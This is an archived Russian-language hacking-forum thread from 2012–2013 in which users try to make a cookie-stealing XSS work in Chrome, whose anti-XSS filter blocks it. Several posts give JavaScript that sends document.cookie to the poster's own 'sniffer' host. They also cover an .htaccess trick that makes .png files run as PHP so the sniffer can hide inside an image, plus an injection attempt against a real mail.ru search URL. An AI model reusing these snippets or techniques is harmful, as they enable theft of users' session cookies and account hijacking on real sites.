HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Обход Chrome XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.02.2012, 13:26
LABERT
Новичок
Регистрация: 28.01.2012
Сообщений: 7
Провел на форуме:
1927

Репутация: 0
По умолчанию
Обход пассивка xss Chrome

Видел одну тему:

Код HTML:
Обход Chrome
 и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например 
 img = new Image(); img.src = "http://s.gif?"+document.cookie;
 это мы скрываем расширение .js
 и открываем на хосте файлом .htaccess нашу картинку и кукисы наши .
Делаю так - в .htaccess у меня :AddType application/x-httpd-php .png; Сделал картинку test.png в ней написал код :

img = new Image(); img.src = "http://мой_сниффер/image.png?"+document.cookie; - т.е перенаправляю на мой сниффер.

Но Chrome не "проглатывает" этот ядовитый код в картинке ,если напрямую указать на сниффер, то приходят ВСЕ кроме cookie...

Что я делаю не так ( В Опере все работает через js) срочно нужна помощь ...какой код надо вписать в картинку? и .htaccess?
 
Ответить с цитированием

  #2  
Старый 23.02.2012, 12:15
LABERT
Новичок
Регистрация: 28.01.2012
Сообщений: 7
Провел на форуме:
1927

Репутация: 0
По умолчанию
Может есть вариант справиться с фильтрами Хрома ,описано здесь Bypassing Chrome’s Anti-XSS filter

http://blog.securitee.org/?p=37 но этот баг уже пофиксили )))
 
Ответить с цитированием

  #3  
Старый 23.02.2012, 22:03
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728

Репутация: 62
По умолчанию
ещё один.. указывая в .htaccess AddType application/x-httpd-php .png ты всего лишь указываешь серверу обрабатывать файлы .png как php, затем в «картинке» нужно написать свой «ядовитый» код но в качестве принимающей стороны, тоесть на php, а не js. что-то вроде

а жертве передать уже свой js со ссылкой на этот файл, где через гет переменную с передать document.cookie. а передать просто файл в котором у тебя написан твой js не прокатит, так как внутри него ты будешь пытаться записать cookie с того же домена на котором он расположен.
 
Ответить с цитированием

  #4  
Старый 24.02.2012, 11:45
LABERT
Новичок
Регистрация: 28.01.2012
Сообщений: 7
Провел на форуме:
1927

Репутация: 0
По умолчанию
Ты наверное имел ввиду ,такой пример:

js:

document.write("/cookie.php?c=" + document.cookie +"\">");

cookie.php:

javascript-ы подгружаемые с моего сайта во время выполнения XSS не срабатывают (независимо какой код в них)

Например в адресной строке Хрома ввожу :

http://www.mail.ru/jsearch/?s=">

file.js -подгружается в Хром (видно по обменам пакетами в СommonView) , но не срабатывает . Может из-за защиты ,

Установленной в последних версиях

В опере и в мозиле эта xss-ка "легко" срабатывает . У кого нибудь есть простой пример xss в Хроме...наблюдается тенденция опережения среди браузеров - Chrome
 
Ответить с цитированием

  #5  
Старый 10.02.2013, 22:47
zadvig4
Новичок
Регистрация: 07.02.2013
Сообщений: 6
Провел на форуме:
1658

Репутация: 0
По умолчанию
Подскажите еще работает метод или мб другой есть?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.